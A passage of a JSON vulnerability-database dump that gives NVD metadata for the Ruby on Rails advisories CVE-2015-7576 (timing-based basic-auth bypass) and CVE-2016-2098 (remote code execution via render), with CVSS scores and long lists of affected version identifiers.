"cpe:2.3:a:rubyonrails:ruby_on_rails:4.1.14.1:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.2.13:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.0:beta:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:3.2.14:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:5.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.1:rc3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.0.9:rc3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.2:rc3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.0.7:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:4.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:3.2.14:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.1:rc4:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.2.15:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.13:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.1.2:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.5:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.6:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.1.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.10:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.12:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.1.4:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.0.12:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.15:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.16:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.1:rc3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:4.0.11.1:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.2.7:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.2.10:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:3.2.22:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.0.4:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.0.9:rc4:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.9:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.1.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.12:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.2.2:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.2.9:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.1:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.1.2:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:4.0.12:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:5.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.3:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.0.10:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.1.1:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.0.9:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.0.20:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.10:rc3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:5.0.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.1.0:rc6:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.5:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.1:rc4:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.2.17:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.6:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.0.8:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:5.0.0:beta1.1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.1.5:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:3.2.14:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.14:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.6:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.0.0:rc:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.2.4:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.2.8:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:3.2.22.1:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.10:rc4:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.0.6:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.10:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.2:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.2.13:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.4:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.1.0:rc5:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.10:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.1.0:rc4:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:3.2.19:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.0.18:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.0.5:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.0:-:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.0.6:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.1.10:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T02:44:16", "description": "The http_basic_authenticate_with method in actionpack/lib/action_controller/metal/http_authentication.rb in the Basic Authentication implementation in Action Controller in Ruby on Rails before 3.2.22.1, 4.0.x and 4.1.x before 4.1.14.1, 4.2.x before 4.2.5.1, and 5.x before 5.0.0.beta1.1 does not use a constant-time algorithm for verifying credentials, which makes it easier for remote attackers to bypass authentication by measuring timing differences.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 3.7, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2016-02-16T02:59:00", "type": "cve", "title": "CVE-2015-7576", "cwe": ["CWE-254"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7576"], "modified": "2019-08-08T15:43:00", "cpe": ["cpe:/a:rubyonrails:rails:4.1.1", "cpe:/a:rubyonrails:rails:4.0.6", "cpe:/a:rubyonrails:rails:4.2.5", "cpe:/a:rubyonrails:rails:4.0.10", "cpe:/a:rubyonrails:rails:4.1.7", "cpe:/a:rubyonrails:rails:4.2.0", "cpe:/a:rubyonrails:rails:4.1.2", "cpe:/a:rubyonrails:rails:4.1.0", "cpe:/a:rubyonrails:rails:4.0.8", "cpe:/a:rubyonrails:rails:4.0.7", "cpe:/a:rubyonrails:ruby_on_rails:4.0.11", "cpe:/a:rubyonrails:rails:5.0.0", "cpe:/a:rubyonrails:rails:4.0.3", "cpe:/a:rubyonrails:rails:4.1.12", "cpe:/a:rubyonrails:rails:4.1.4", "cpe:/a:rubyonrails:rails:4.1.10", "cpe:/a:rubyonrails:ruby_on_rails:4.0.11.1", "cpe:/a:rubyonrails:ruby_on_rails:4.0.12", "cpe:/a:rubyonrails:ruby_on_rails:4.0.10", "cpe:/a:rubyonrails:ruby_on_rails:3.2.22", "cpe:/a:rubyonrails:rails:4.0.0", "cpe:/a:rubyonrails:rails:4.1.6", "cpe:/a:rubyonrails:rails:4.2.3", "cpe:/a:rubyonrails:ruby_on_rails:4.0.13", "cpe:/a:rubyonrails:rails:4.2.4", "cpe:/a:rubyonrails:rails:4.0.4", "cpe:/a:rubyonrails:rails:4.0.2", "cpe:/a:rubyonrails:rails:4.1.9", "cpe:/a:rubyonrails:rails:4.0.1", "cpe:/a:rubyonrails:rails:4.2.1", "cpe:/a:rubyonrails:rails:4.1.7.1", "cpe:/a:rubyonrails:rails:4.1.8", "cpe:/a:rubyonrails:rails:4.1.5", "cpe:/a:rubyonrails:rails:4.2.2", "cpe:/a:rubyonrails:rails:4.0.5", "cpe:/a:rubyonrails:rails:4.1.3", "cpe:/a:rubyonrails:rails:4.1.14", "cpe:/a:rubyonrails:ruby_on_rails:4.1.11", "cpe:/a:rubyonrails:rails:4.0.9", "cpe:/a:rubyonrails:rails:4.1.13"], "id": "CVE-2015-7576", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7576", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:rubyonrails:rails:4.1.10:rc3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.1:-:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:4.1.11:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.14:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.12:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:5.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.10:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.1:rc4:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.1:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.9:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.14:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.6:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:4.0.11.1:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.0:beta:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.4:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.6:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.2:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.1:rc3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.10:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.3:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.5:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.13:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.6:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.10:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.6:rc3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.0:-:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.2:rc3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.5:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:4.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.10:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.14:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:4.0.10:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:4.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.12:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.1:rc4:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.13:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.4:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.0:-:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:4.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:3.2.22:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.2:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.6:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.1:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.1:rc3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.10:rc4:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:4.0.13:rc1:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:06:31", "description": "Action Pack in Ruby on Rails before 3.2.22.2, 4.x before 4.1.14.2, and 4.2.x before 4.2.5.2 allows remote attackers to execute arbitrary Ruby code by leveraging an application's unrestricted use of the render method.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 7.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.4}, "published": "2016-04-07T23:59:00", "type": "cve", "title": "CVE-2016-2098", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2098"], "modified": "2019-08-08T15:43:00", "cpe": ["cpe:/a:rubyonrails:rails:4.1.0", "cpe:/a:rubyonrails:rails:4.1.12", "cpe:/a:rubyonrails:rails:4.2.0", "cpe:/a:rubyonrails:rails:4.0.6", "cpe:/a:rubyonrails:rails:4.2.5", "cpe:/a:rubyonrails:rails:4.0.10", "cpe:/a:rubyonrails:rails:4.0.2", "cpe:/a:rubyonrails:rails:4.0.5", "cpe:/a:rubyonrails:rails:4.2.1", "cpe:/a:rubyonrails:rails:4.1.1", "cpe:/a:rubyonrails:rails:4.1.8", "cpe:/a:rubyonrails:rails:4.2.2", "cpe:/a:rubyonrails:rails:4.0.3", "cpe:/a:rubyonrails:rails:4.1.7.1", "cpe:/a:rubyonrails:rails:4.2.4", "cpe:/a:rubyonrails:rails:4.0.4", "cpe:/a:rubyonrails:rails:4.1.14", "cpe:/a:rubyonrails:rails:4.1.2", "cpe:/a:rubyonrails:rails:4.1.6", "cpe:/a:rubyonrails:rails:4.0.7", "cpe:/a:rubyonrails:rails:4.1.7", "cpe:/a:rubyonrails:rails:4.2.5.1", "cpe:/o:debian:debian_linux:8.0", "cpe:/a:rubyonrails:rails:4.1.3", "cpe:/a:rubyonrails:rails:4.2.3", "cpe:/a:rubyonrails:rails:4.1.5", "cpe:/a:rubyonrails:rails:4.1.9", "cpe:/a:rubyonrails:rails:4.0.0", "cpe:/a:rubyonrails:ruby_on_rails:4.1.14.1", "cpe:/a:rubyonrails:rails:4.1.10", "cpe:/a:rubyonrails:rails:4.0.9", "cpe:/a:rubyonrails:rails:4.1.4", "cpe:/a:rubyonrails:rails:4.0.1", "cpe:/a:rubyonrails:ruby_on_rails:3.2.22.1", "cpe:/a:rubyonrails:rails:4.1.13", "cpe:/a:rubyonrails:rails:4.0.8"], "id": "CVE-2016-2098", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-2098", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:rubyonrails:rails:4.1.10:rc3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.1:rc3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.6:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.2:rc3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.1:rc4:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.6:rc3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.13:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.5:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.6:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.6:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.5:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.4:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.1:rc4:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.1:-:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.2:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.10:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.6:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.1:rc3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.14:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.10:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:3.2.22.1:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.10:rc4:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.1:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.9:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.0:beta1:*:*:*:*:*:*", 